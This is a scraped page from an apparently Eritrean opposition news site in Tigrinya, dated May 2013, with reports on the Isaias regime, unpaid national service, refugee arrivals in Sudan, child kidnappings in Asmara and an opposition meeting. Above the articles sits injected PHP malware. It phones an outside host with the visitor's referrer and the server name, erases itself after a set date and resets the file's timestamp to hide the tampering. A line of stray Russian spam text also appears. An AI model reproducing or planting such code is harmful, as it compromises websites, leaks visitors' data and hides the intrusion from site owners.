check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ምልካዊ ስርዓት ኢሳይያስ ሙሉእ ብሙሉእ ከይተኣለየ ሓርነት ህዝቢ ጋህዲ ክኸውን ዘይሕሰብ’ዩ ክብሉ ዜጋታት ይገልጹ’ለው።
кремлевская диета

ምልካዊ ስርዓት ኢሳይያስ ሙሉእ ብሙሉእ ከይተኣለየ ሓርነት ህዝቢ ጋህዲ ክኸውን ዘይሕሰብ’ዩ ክብሉ ዜጋታት ይገልጹ’ለው።

User Rating: / 0
PoorBest 

 

 

 

 

16 ግንቦት  2013

ምልካዊ ስርዓት ኢሳይያስ ሙሉእ ብሙሉእ ከይተኣለየ ሓርነት ህዝቢ ጋህዲ ክኸውን ዘይሕሰብ ክብሉ ዜጋታት ይገልጹለው።

ኣብ ውሽጢ ዝርከቡ ምንጭታት ወጋሕታ ሳሊና ዝሰደዱልና ሓበሬታ ከምዘረጋገጾ ኩሉ ዓይነት መሰላት ህዝቢ  ጨውዩ ኣብ ስልጣን ዝርከብ ስርዓት ኢሳይያስ ካብ ሱሩ ከይተመሓወ ሓርነት ህዝቢ ክጋሃድ ፈጺሙ ከም ዘይከኣል ዜጋታት ዝገልጹሉ ኩነታት ልዕሊ ዝኾነ ይኹን እዋን  ዛይዱሎ።

እቲ ስርዓት ዝኽተሎ ዝጸንሐን ዘሎን ዝምቡዕ ፖሊሲታት ካብ ዝሓለፉ መግዛእታዊ ስርዓታት ዝኸፍአ ከምዝኾነ ዝተገንዘቡ እቶም ዜጋታት ሕድሪ መቃልስቱ ጠሊሙ ንዓመታት ዝተኸተሎ ናይ ዕንወት መንገዲ ንሃለዋት ህዝብን ሃገርን ኣብ ሓደጋ ዝሸመመ ኩነት ኣኸሲቱ ምህላው ድማ እምነቶም ይገልጹ ምህላዎም ኣረዲኡ።

በቲ ምልካዊ ስርዓት ተስፋ ዝሰኣኑ ዜጋታትና ብሓፈሻ ዓንዲ ሕቆ ሃገር ዝኾኑ መንእሰያት ድማ ብፍላይ ናብ ስደት ዝፈርሱሉ ዘለው ህሞት ከተማታትን ዓድታትን ዝባድማሉ ሓደጋ ፈጢሩ ምህላውን ናይዚ ኩሉ ሓደጋ ተሓተቲ ድማ ኢሳይያስ ባዕሉ ምዃኑ ዜጋታት ይገልጹ ምህላዎም እቲ ሓበሬታ የነጽር።

እቶም ዜጋታት ኣብ መወዳእታ ስርዓት ኢሳይያስ ከይተኣለየ ሓርነት ክገሃድስ ይትረፍ ኤርትራ ውሕስቲ ሃገር ኮይና ትቕጽለሉ ኩነታት ኣብ ሓደጋ ይወድቅ ብምህላው ናይ ቀዳምነት ቀዳምነት ውራይ ምድሓን ህዝብን ሃገርን ሰሪዕካ ምቅላስ ከምዘድሊ ኩሉ ክግንዘቦ ከምዝግባእ ኣተሓሳሲቦምዮም።

----------------------------------////////////---------------------------------------

16 ግንቦት  2013

መሃያ ኣልቦ ጉልበታዊ ምዝመዛ ዜጋታትና ደው ይበል

ዝብል ስምዒታት ኣብ ሰራዊት ይጓሃሃር ኣሎ።

ምልካዊ ስርዓት ኢሳይያስ ኣገልግሎት ዝብል ሽፋን እንዳተጠቕመ ኣብ ልዕሊ ዜጋታትና ዝገብሮ ዘሎ መሃያ ኣልቦ ጉልበታዊ ምዝመዛ ብቕልጡፍ ደው ክብል ኣለዎ ዝብል ስምዒታት ኣብ ሰራዊት ብሰፊሑ ይለዓዓል ኣሎ ክብሉ ኣብ ውሽጢ ዝርከቡ ምንጭታት ወጋሕታ ሳሊና ኣብ ዝሰደዱልና ሓበሬታ ገሊጾም።

እቲ ስርዓት ኣገልግሎት ዝብል ሽፋን ተጠቒሙ ንነዊሕ ዓመታት ጉልበት ዓሰርተታት ኣሸሓት መንእሰያት ዜጋታትና መህጠሪ ጅቡኡ ክገብሮ ምጽንሑ ንዓቕሊ ሰራዊት ክፈታትን ጸኒሑ’ዩ ዝበሉ ምንጭታትና ኣብ መነባብሮ ህዝቢ ለውጢ ክሳብ ዘየምጸአ እዚ ጉልበታዊ ምዝመዛ ካብ ባርነት ሓሊፉ ካልእ ትርጉም ከም ዘይዋሃቦ እቲ ሰራዊት ክግንዘቦ ምጅማሩ ድማ ኣነጺሮም

ደጊም ህዝቢን ሰራዊትን ስርዓት ኢሳይያስ ክብሎ ብዝጸነሐ ብገንኡ ዝበንን ተስፋታት ዝዕሸወሉ ግዜ ከም ዘይህሉ ብምግላጽ ድማ ነቲ ስርዓት ብምቅባጽ ዜጋታት ተጠቀምቲ ዝኾኑላ ኤርትራ ጋህዲ ምግባር ሓላፍነት ኩሉ ብህዝቡን ሃገሩን ዝግደስ ኤርትራዊ ምዃኑ ልዕሊ ዝኾነ ይኹን እዋን እምነት ሰራዊት ይኸውን ከምዘሎ ሓበሬታ ምንጭታትና ወሲኹ ሓቢሩ’ሎ።

------------------------------------//////////---------------------------------------

16 ግንቦት  2013

ኣብ ወርሒ ሚያዝያ ጥራይ 298 ዜጋታትና ኣብ መዓስከር

ስደተኛታት ሸገራብ ተዓቍቦም።

ካብ 1-30 ሚያዝያ 2013 ኣብ ዝነበረ 30 መዓልታት ጥራይ 298 ኤርትራውያን ኣብ ምብራቕ ሱዳን ናብ ዝርከብ መደበር ስደተኛታት ሸገራብ ከምዝኣተዉ ቤት ጽሕፈት ዜናን ባህልን ሰልፊ ዲሞክራሲ ህዝቢ ኤርትራ ኣብ ዝዘርገሖ ዜና ሓቢሩ።

ካብዞም 298 ዜጋታትና እተን 86 ደቐንስትዮ ክኾና ከለዋ ካብኣተን እተን 11 ትሕቲ 5 ዓመት ዝዕድሚኤን ህጻናት’የን።

ካብ ወርሒ ጥሪ ዓመተ 2010 ክሳብ 30 ሚያዝያ 2013 ኣብቲ መዓስከር ዑቕባ ናይ ዝሓተቱ ስደተኛታት ዜጋታትና ኣሃዝ ድማ 61,042 (ስሳን ሓደ ሽሕን ኣርባዓን ክልተን) በጺሑ ከም ዘሎ እቲ ሰልፊ ዝዘርግሖ ዜና ሓቢሩ።

16 ግንቦት  2013

ብጭውያ ቆልዑ ዝተሻቐሉ ገለ ርእሰ -መማህራን ኣስመራ

ወለዲ ጥንቃቐታት ከዘውትሩ ብደብዳበ ከምዘዘኻኽሩ ተፈሊጡ።

በቲ ኣብ ኣስመራ እናገነነ ዝኸይድ ዘሎ ጭውያ ቆልዑ ዝተሻቐሉ ገለ ርእሰ መማህራን መባእታ ኣብያተ ትምህርቲ ኣስመራ፡ ወለዲ ደቆም ናብ ትምህርቲ ኣብ ምፍናውን ምቕባልን ልዑል ጥንቃቐታት ከዘውትሩ ብደብዳብ ከምዘዘኻኽሩ ምንጭታትና ካብ ኣስመራ ሓቢሮም።

ኣብ ዝሓለፈ ሳምንታት ካብ ጀርመን ኣስመራ ዝበጽሓት ስድራቤት ብኡንብኡ ሓደ ቆልዓ ስለዝተጨወያ ኣሻሓት ገንዘብ ከፊላ ከምዝረኸበቶ ተፈሊጡ።

እታ ብምጥፋእ ናይቲ ቆልዓ ዝተጨነቐት ስድራ ዓቕላ ኣጽቢባ ምትሕግጋዝ ሓደ ሓላፊ ኣብ ዝሓተተትሉ እዋን እታ ዝለዓለት ክገብራ ዝክእል ሓገዝ ምስቶም ጨወይቲ ኣብ መጠን ናይቲ ገንዘብ ምዝታይ ጥራይ ምዃኑ ድሕሪ ምሕባሩ ነቲ ዝተሓተተቶ ኣሻሓት ገንዘብ ክትከፍል ከምዝተገደደት’ውን እቲ ሓበሬታ ብተወሳኺ የረድእ።

እቲ ንኤርትራውያን ኣብ ሲናይ ዘጋጥሞም ዘሎ ጭውያን መሸጣን ኣብ ውሽጢ ኣስመራ ይኽሰት ምህላዉ ስርዓት ህግደፍ ስልጣኑ ኣብ ምሕላው ጥራይ እምበር ድሕነት ህዝቢ ከምዘየገድሶ ዘረጋግጽ ምዃኑ’ውን ዜጋታት ብመረረት ይዛረቡሉ’ለው

ኣብ ኣስመራ ምእንቲ ገንዘብ ሓያለ ቆልዑ ተጨውዮም ይጠፍኡ ብምህላዎም “ዝረኣየ ዓይኑ ይብራህ” ዝብል ምልክታታት ፈቐዶ ጎደናታት ተጠቂዑ ይረአ ከምዘሎ ገሊጽና ምንባርና ይዝከር።

--------------------------------------////////////-----------------------------------

16 ግንቦት  2013

ግንባር ሃገራዊ ድሕነት ኤርትራ ምስ  ኩለን ተቓወምቲ ውድባት

ናይ ምርድዳእ ኣፍ ደገ ከፊቱ ኣንጻር ህግደፍ ዘቅንዐ ቃልሲ

ከካይድ ምዃኑ ገሊጹ።

ኣብ ኢንድያና ሰፊሕ ኣኼባ ዘካየደ ግንባር ሃገራዊ ድሕነት ኤርትራ ኣብ ቀጻሊ ኣብ ዘካይዶ ካልኣይን ሓድነታውን ጉባኤ ምስ ዝተፈላለያ ተቓወምቲ ውድባት ኤርትራ ሰሚሩ ኣንጻር ስርዓት ህግደፍ ዘቕንዐ ፖሊሰ ኣብ ምክያድ ይነጥፍ ምህላው ሓቢሩ’ሎ።

ሓድነት ምስ ዝቕበላ ሓድነት ክገብር፡ ብሓባር ምስራሕ ምስ ዝቕበላ ድማ ኣብ ምጽውዋርን ምክእኣልን ዝተደረኸ ናይ ምርድዳእ ኣፍደገ ከፊቱ ምህላው ዝገለጸ እቲ ግንባር ስርዓት ህግደፍ ካብ ሱሩ ንምምሓው ኣብ ዝግበር ቃልስ በርቲዑ ክሰርሕ ምዃኑ’ውን ኣስሚሩሉ’ዩ።

ኣብቲ ኣኼባ ምክትል ኣቦ-መንበር ስርዒታዊ ጉዳያት  ኣቶ ክፍለዝጊ ገብረመድህን ፡ ጸሓፊ ወጻኢ ጉዳያት ኣቶ ተኽለ ኣማን ከምኡ’ውን ኣቦ መንበር ጨንፈር ኢንዲያና አቶ ቦኽረ ፍትውን ተረኺቦም ምንባሮም’ውን ኣረጋጊጹ’ሎ።

----------------------------------------//////////-----------------------------------

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player